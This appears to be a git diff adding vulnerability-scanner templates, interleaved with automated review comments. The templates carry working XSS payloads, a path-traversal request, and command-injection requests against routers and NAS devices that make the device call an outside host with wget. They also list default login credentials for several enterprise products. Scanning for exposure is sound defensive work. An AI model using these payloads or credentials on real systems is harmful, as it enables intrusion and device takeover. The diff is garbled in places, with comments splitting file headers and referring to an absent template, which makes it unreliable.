\ No newline at end of file
diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml
new file mode 100644
index 0000000000..55c9e48f5d
--- /dev/null
+++ b/cves/2019/CVE-2019-15713.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-15713
+
+info:
+ name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
+ reference: |
+ - https://wpscan.com/vulnerability/9267
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml
new file mode 100644
index 0000000000..f067dd1e34
--- /dev/null
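Review bot: The CVE-2019-12616 body matcher requires the literal string `4.6.6deb4+deb9u2`, which is a single Debian package build of phpMyAdmin, so the template reports only that build and stays silent on every other vulnerable release; since the request only fetches `/phpmyadmin/` and never exercises the CSRF, `name` and `description` should state that this is a version fingerprint, or the word should become a version regex covering the affected range named in the referenced advisory. The `description` has a doubled space in `broken  tag` (a word appears to have been lost there), and `severity` sits after `description` whereas every other new template in this commit places it after `author`. The file is also added without a trailing newline.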
+++ b/cves/2019/CVE-2019-16332.yaml
@@ -0,0 +1,30 @@
+id: CVE-2019-16332
+
+info:
+ name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml
new file mode 100644
index 0000000000..3ff0907f88
--- /dev/null
+++ b/cves/2019/CVE-2019-16525.yaml
@@ -0,0 +1,30 @@
+id: CVE-2019-16525
+
+info:
+ name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml new file mode 100644 index 0000000000..1c31973d6b --- /dev/null +++ b/cves/2019/CVE-2019-20085.yaml @@ -0,0 +1,26 @@ +id: CVE-2019-20085 + +info: + name: TVT NVMS 1000 - Directory Traversal + author: daffainfo + severity: high + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + tags: cve,cve2019,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + - type: status + status: + - 200 diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index e937c8a86e..11b19bcd64 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - "" + - "catch-breadcrumb" part: body + condition: and - type: word part: header diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index 2e265da33c..0fdc277777 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -20,6 +20,11 @@ requests: - "" part: body + - type: word + words: + - "nova-lite" + part: body + - type: word part: header words: diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml new file mode 100644 index 0000000000..18de468cad --- /dev/null +++ b/cves/2020/CVE-2020-25506.yaml 
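Review bot: The single CVE-2019-20085 path `{{BaseURL}}/../../../../../../../../../../../Windows/win.ini` depends on the dot segments reaching the server verbatim; if the HTTP client normalises `..` before sending (which client settings apply cannot be told from this page), the request degrades to `/Windows/win.ini` and the regex never matches, so confirm against a known-vulnerable device or express it as a raw request with `unsafe: true`. The description `TVT NVMS-1000 devices allow GET /.. Directory Traversal` would be more useful to a reader if it said which file the template reads and that only the Windows case is covered, e.g. `  description: TVT NVMS-1000 devices allow directory traversal via GET /..; this check reads Windows/win.ini.`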
@@ -0,0 +1,35 @@
+id: CVE-2020-25506
+
+info:
+ name: D-Link DNS-320 - Unauthenticated Remote Code Execution
+ author: gy741
+ severity: critical
+ description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
+ reference: |
+ - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
+ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
+ tags: cve,cve2020,dlink,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /cgi-bin/system_mgr.cgi? HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: */*
+ Connection: close
+
+ C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
+
+ - |
+ POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: */*
+ Connection: close
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml
new file mode 100644
index 0000000000..c658ea4e31
--- /dev/null
+++ b/cves/2020/CVE-2020-26919.yaml
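Review bot: The CVE-2020-25506 `description` is written from the exploit's point of view (`The exploit targets a command injection vulnerability ...`), whereas the field should describe the flaw in the product; rephrase to something like `  description: D-Link DNS-320 system_mgr.cgi does not sanitise the f_ntp_server parameter, allowing unauthenticated command execution.` Both raw requests carry the same callback, once in the body and once in the query string, and there is no `stop-at-first-match: true`, so a vulnerable device produces two interactions; if the two forms target different firmware builds, a comment above each request saying which one it is for would make that clear.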
@@ -0,0 +1,28 @@
+id: CVE-2020-26919
+
+info:
+ name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution
+ author: gy741
+ severity: critical
+ description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.
+ reference: |
+ - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
+ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
+ tags: cve,cve2020,netgear,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /login.htm HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: */*
+ Connection: close
+
+ submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml
new file mode 100644
index 0000000000..d65d7e96c6
--- /dev/null
+++ b/cves/2020/CVE-2020-35713.yaml
@@ -0,0 +1,29 @@
+id: CVE-2020-35713
+
+info:
+ name: Linksys RE6500 Pre-Auth RCE
+ author: gy741
+ severity: critical
+ reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
+ description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
+ tags: cve,cve2020,linksys,rce,oob,router
+
+requests:
+ - raw:
+ - |
+ POST /goform/setSysAdm HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: keep-alive
+ Origin: http://{{Hostname}}
+ Referer: http://{{Hostname}}/login.shtml
+
+ admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml
new file mode 100644
index 0000000000..d1d4550b3f
--- /dev/null
+++ b/cves/2021/CVE-2021-31755.yaml
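Review bot: The request posts `admuser=admin&admpass=…&AuthTimeout=600&wirelessMgmt_http=1` to `/goform/setSysAdm`, which the description itself says can `set a new password`; a successful run may therefore overwrite the device's admin credentials and session settings, and that should be stated in `description` (or a comment above the request) so the template is not treated as a read-only check. The `reference`/`description` key order is also inverted relative to the other CVE templates in this commit; keeping `description` before `reference` makes the files uniform.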
@@ -0,0 +1,32 @@
+id: CVE-2021-31755
+
+info:
+ name: Tenda Router AC11 RCE
+ description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+ author: gy741
+ severity: critical
+ reference: |
+ - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
+ - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
+ tags: cve,cve2021,tenda,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /goform/setmac HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Origin: http://{{Hostname}}
+ Referer: http://{{Hostname}}/index.htmlr
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+ Content-Type: application/x-www-form-urlencoded
+
+ module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml
new file mode 100644
index 0000000000..254903e532
--- /dev/null
+++ b/default-logins/aem/adobe-aem-default-credentials.yaml
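Review bot: The body posts a complete wireless configuration alongside the injected `mac` value (`wifiSSID=Tenda_B0E040`, `wifiPwd=Password12345`, `wifiSSID_5G=…`, `wanType=static`), so a vulnerable router may have its Wi-Fi and WAN settings overwritten; document this as a configuration-changing check in `description`. The description also has a typo (`enda Router AC11` → `Tenda Router AC11`), and `Referer: http://{{Hostname}}/index.htmlr` looks like a typo for `index.html` — confirm against the reference before changing it.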
@@ -0,0 +1,67 @@
+id: adobe-aem-default-credentials
+
+info:
+ name: Adobe AEM Default Credentials
+ author: random-robbie
+ severity: critical
+ tags: aem,default-login
+ reference:
+
+requests:
+
+ - payloads:
+
+ rr_username:
+ - admin
+ - grios
+ - replication-receiver
+ - vgnadmin
+ - aparker@geometrixx.info
+ - jdoe@geometrixx.info
+ - james.devore@spambob.com
+ - matt.monroe@mailinator.com
+ - aaron.mcdonald@mailinator.com
+ - jason.werner@dodgit.com
+
+ rr_password:
+ - admin
+ - password
+ - replication-receiver
+ - vgnadmin
+ - aparker
+ - jdoe
+ - password
+ - password
+ - password
+ - password
+
+ attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
+
+ raw:
+ - |
+ POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+ Accept: text/plain, */*; q=0.01
+ Accept-Language: en-US,en;q=0.5
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+ Content-Length: 67
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}/libs/granite/core/content/login.html
+ Connection: close
+
+ _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - login-token
+ - crx.default
+ condition: and
diff --git a/default-logins/dell/dell-emc-ecom-default-credentials.yaml b/default-logins/dell/dell-emc-ecom-default-credentials.yaml
new file mode 100644
index 0000000000..5c46e83359
--- /dev/null
+++ b/default-logins/dell/dell-emc-ecom-default-credentials.yaml
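Review bot: `reference:` is left empty, which YAML loads as `null`; either fill in a source for these account/password pairs or drop the key, and add a `description` since every other default-login template in this commit has one. `Content-Length: 67` is fixed while the body length varies with each `{{rr_username}}`/`{{rr_password}}` pair; if nuclei does not recompute the header for raw requests the body would be truncated for longer pairs, so either remove the header or confirm it is recomputed. A short comment on the `login-token`/`crx.default` header words explaining why both are required for a positive result would help future readers (their meaning is inferred from `condition: and`, not verifiable here).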
@@ -0,0 +1,31 @@
+id: dell-emc-ecom-default-credentials
+
+info:
+ name: Dell EMC ECOM Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of admin:#1Password on Dell EMC ECOM application.
+ reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
+ tags: dell,emc,ecom,default-login
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ headers:
+ Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: ECOMSecurity"
+ part: header
+
+ - type: word
+ words:
+ - "Welcome to ECOM"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml
new file mode 100644
index 0000000000..132cee76fd
--- /dev/null
+++ b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml
@@ -0,0 +1,31 @@
+id: hortonworks-smartsense-default-credentials
+
+info:
+ name: HortonWorks SmartSense Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of admin:admin on HortonWorks SmartSense application.
+ reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
+ tags: hortonworks,smartsense,default-login
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/apt/v1/context'
+ headers:
+ Authorization: Basic YWRtaW46YWRtaW4=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: SUPPORTSESSIONID"
+ part: header
+
+ - type: word
+ words:
+ - "smartsenseId"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
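Review bot: The `Authorization: Basic YWRtaW46IzFQYXNzd29yZA==` value is opaque in the template; add an inline comment `# base64(admin:#1Password)` so the credential being tested is readable without decoding and matches what `description` states. The `Set-Cookie: ECOMSecurity` header word may also be set on failed logins, so the `Welcome to ECOM` body word is presumably what carries the result — a comment saying so would help maintainers keep it.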
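Review bot: The path `/apt/v1/context` looks like a typo for `/api/v1/context` — confirm against the SmartSense reference before merging, because a wrong path makes the template silently never match. As with the Dell template on the same line, document the `Authorization` value with `# base64(admin:admin)` so the tested credential is readable.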
diff --git a/default-logins/idemia/idemia-biometrics-default-credentials.yaml b/default-logins/idemia/idemia-biometrics-default-credentials.yaml
new file mode 100644
index 0000000000..da3d4290e4
--- /dev/null
+++ b/default-logins/idemia/idemia-biometrics-default-credentials.yaml
@@ -0,0 +1,34 @@
+id: idemia-biometrics-default-credentials
+
+info:
+ name: IDEMIA BIOMetrics Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of password=12345 on IDEMIA BIOMetrics application.
+ reference: https://www.google.com/search?q=idemia+password%3D+"12345"
+ tags: idemia,biometrics,default-login
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/cgi-bin/login.cgi'
+
+ body: password=12345
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "session_id="
+ - "resource"
+ condition: and
+
+ - type: word
+ words:
+ - "Invalid Password"
+ part: body
+ negative: true
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/paloalto/panos-default-credentials.yaml b/default-logins/paloalto/panos-default-credentials.yaml
new file mode 100644
index 0000000000..15bc58afa5
--- /dev/null
+++ b/default-logins/paloalto/panos-default-credentials.yaml
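Review bot: `reference:` points at a Google search query rather than a stable source; replace it with a vendor document or advisory URL (not known from this hunk) so the claim can be verified later. `description` gives only `password=12345` without saying which account or form it applies to; `description: IDEMIA BIOMetrics login.cgi accepts the default password 12345.` would be clearer — assuming that is the intent, since only the body `password=12345` is visible.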
@@ -0,0 +1,31 @@
+id: panos-default-credentials
+
+info:
+ name: Palo Alto Networks PAN-OS Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application.
+ reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
+ tags: paloalto,panos,default-login
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/php/login.php'
+
+ body: user=admin&passwd=admin&challengePwd=&ok=Login
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: PHPSESSID"
+ part: header
+
+ - type: word
+ words:
+ - "Warning: Your device is still configured with the default admin"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/ricoh/ricoh-weak-password.yaml b/default-logins/ricoh/ricoh-weak-password.yaml
new file mode 100644
index 0000000000..a7db0ce8a6
--- /dev/null
+++ b/default-logins/ricoh/ricoh-weak-password.yaml
@@ -0,0 +1,28 @@
+id: ricoh-weak-password
+
+info:
+ name: Ricoh Weak Password
+ author: gy741
+ severity: high
+ tags: ricoh,default-login
+ reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
+
+requests:
+ - raw:
+ - |
+ POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: cookieOnOffChecker=on;
+
+ wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open=
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - 'wimsesid=[0-9]+'
+ part: header
+
+ - type: status
+ status:
+ - 302
diff --git a/default-logins/visionhub/visionhub-default-credentials.yaml b/default-logins/visionhub/visionhub-default-credentials.yaml
new file mode 100644
index 0000000000..c4bb066e85
--- /dev/null
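Review bot: The reference URL carries a `#:~:text=…` scroll-to-text fragment, which is browser-specific and not part of the document address; trim it to the `…/perform-initial-configuration.html` URL. A comment above the `Warning: Your device is still configured with the default admin` word noting that it is the banner PAN-OS shows after logging in with unchanged credentials would record why it is the key matcher (presumed from the text, not verifiable here).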
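Review bot: This template has no `description`, and the request body is the only place that reveals what is tested: `userid=YWRtaW4%3D` (base64 `admin`) with an empty `password=`; add `description: Ricoh Web Image Monitor login accepts the admin account with an empty password.` — assuming that is the intent, since the id says weak password and the tag says default-login. The `Cookie: cookieOnOffChecker=on;` header has a stray trailing semicolon.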
+++ b/default-logins/visionhub/visionhub-default-credentials.yaml
@@ -0,0 +1,27 @@
+id: visionhub-default-credentials
+
+info:
+ name: VisionHub Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of admin:admin on VisionHub application.
+ tags: visionhub,default-login
+ reference: https://www.qognify.com/products/visionhub/
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/VisionHubWebApi/api/Login'
+ headers:
+ Authorization: Basic YWRtaW46YWRtaW4=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: admin"
+ part: header
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml
index 64115ff057..a6e03e96ac 100644
--- a/takeovers/heroku-takeover.yaml
+++ b/takeovers/heroku-takeover.yaml
@@ -2,7 +2,7 @@ id: heroku-takeover
info:
name: heroku takeover detection
- author: pdteam
+ author: 0xPrial,pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@@ -15,7 +15,6 @@ requests:
matchers:
- type: word
words:
- - "There's nothing here, yet."
- "herokucdn.com/error-pages/no-such-app.html"
- "No such app"
condition: and
\ No newline at end of file
diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml
index 9c447ac42f..58c0306995 100644
--- a/takeovers/netlify-takeover.yaml
+++ b/takeovers/netlify-takeover.yaml
@@ -2,7 +2,7 @@ id: netlify-takeover
info:
name: netlify takeover detection
- author: pdteam
+ author: 0xPrial,pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@@ -16,9 +16,9 @@ requests:
matchers:
- type: word
words:
- - "Not Found"
+ - "Not found - Request ID:"
- type: word
words:
- - "server: Netlify"
+ - "Netlify"
part: header
\ No newline at end of file
diff --git a/technologies/aem-detection.yaml b/technologies/aem-detection.yaml
new file mode 100644
index 0000000000..85399c2790
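Review bot: The only positive signal is `Set-Cookie: admin` in the response headers plus a 200 status; if the API sets such a cookie on failed logins too, this reports false positives, so confirm against the reference and document the expected success response in a comment. The `Authorization` value should also get `# base64(admin:admin)` so the tested credential is readable, as for the other default-login templates in this commit.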
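Review bot: Replacing `server: Netlify` with `Netlify` widens the header word to any header value containing that string; if the change was made only because the header name is compared case-sensitively, `Server: Netlify` keeps the check narrow — hedged, since nuclei's header handling is not visible here. Whether the two matchers are combined with `and` depends on a `matchers-condition` line outside this hunk.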
--- /dev/null
+++ b/technologies/aem-detection.yaml
@@ -0,0 +1,26 @@
+id: aem-detection
+
+info:
+ name: Favicon based AEM Detection
+ severity: info
+ author: shifacyclewala,hackergautam
+ tags: aem,favicon,tech
+ reference: |
+ - https://twitter.com/brsn76945860/status/1171233054951501824
+ - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
+ - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
+ - https://github.com/devanshbatham/FavFreak
+ - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico"
+
+ redirects: true
+ max-redirects: 2
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml
new file mode 100644
index 0000000000..721bac1466
--- /dev/null
+++ b/technologies/node-red-detect.yaml
@@ -0,0 +1,24 @@
+id: node-red-detect
+
+info:
+ name: Node RED Detect
+ author: pikpikcu
+ severity: info
+ tags: tech,apache
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - "Node-RED"
+
+ - type: status
+ status:
+ - 200
diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml
new file mode 100644
index 0000000000..5f57fd013e
--- /dev/null
+++ b/technologies/sap-igs-detect.yaml
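Review bot: `tags: tech,apache` labels Node-RED, a Node.js application, as Apache software; `tags: tech,node-red` (following the `tech,yapi` style of yapi-detect in this commit) keeps tag-based workflows accurate. A body word `Node-RED` on `/` alone is a weak fingerprint; a comment stating what page element is expected to contain it (title, script name) would help, if that is known.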
@@ -0,0 +1,39 @@
+id: sap-igs-detect
+
+info:
+ name: SAP Internet Graphics Server (IGS) Detection
+ author: _generic_human_
+ description: Detection of SAP Internet Graphics Server (IGS)
+ severity: info
+ tags: sap,tech,igs
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "SAP IGS"
+ - "is running"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "SAP Internet Graphics Server"
+
+ extractors:
+ - type: kval
+ part: header
+ kval:
+ - "Server"
diff --git a/technologies/seeddms-detect.yaml b/technologies/seeddms-detect.yaml
new file mode 100644
index 0000000000..307611e1d0
--- /dev/null
+++ b/technologies/seeddms-detect.yaml
@@ -0,0 +1,21 @@
+id: seeddms-detect
+info:
+ name: Seeddms-
+ author: pussycat0x
+ severity: info
+ tags: tech
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "SeedDMS: Sign in"
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/technologies/yapi-detect.yaml b/technologies/yapi-detect.yaml
new file mode 100644
index 0000000000..fb38ed2157
--- /dev/null
+++ b/technologies/yapi-detect.yaml
@@ -0,0 +1,25 @@
+id: yapi-detect
+
+info:
+ name: YApi Detect
+ author: pikpikcu
+ severity: info
+ tags: tech,yapi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+ - "{{BaseURL}}:3000"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - "YApi-高效、易用、功能强大的可视化接口管理平台"
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml
new file mode 100644
index 0000000000..055c33da1e
--- /dev/null
+++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml
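Review bot: `name: Seeddms-` has a trailing dash and no verb; `name: SeedDMS Detect` matches the other detect templates in this commit, and `tags: tech` should include the product (`tags: tech,seeddms`) so tag-driven workflows can select it. The file also omits the blank lines between `id`, `info` and `requests` that every other template here uses.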
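Review bot: `"{{BaseURL}}:3000"` appends a port to whatever `BaseURL` already is; when the target is supplied as `http://host:8080` or with a path, the result is a malformed URL such as `http://host:8080:3000`, so either document that this path only works for bare-host targets or drop it. A comment giving the meaning of the Chinese title word (`# YApi default page title`) would help reviewers who cannot read it — assuming that is what it is.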
@@ -0,0 +1,35 @@
+id: optilink-ont1gew-gpon-rce
+
+info:
+ name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
+ author: gy741
+ severity: critical
+ description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
+ reference: |
+ - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
+ - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
+ tags: optiLink,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /boaform/admin/formTracert HTTP/1.1
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Content-Type: application/x-www-form-urlencoded
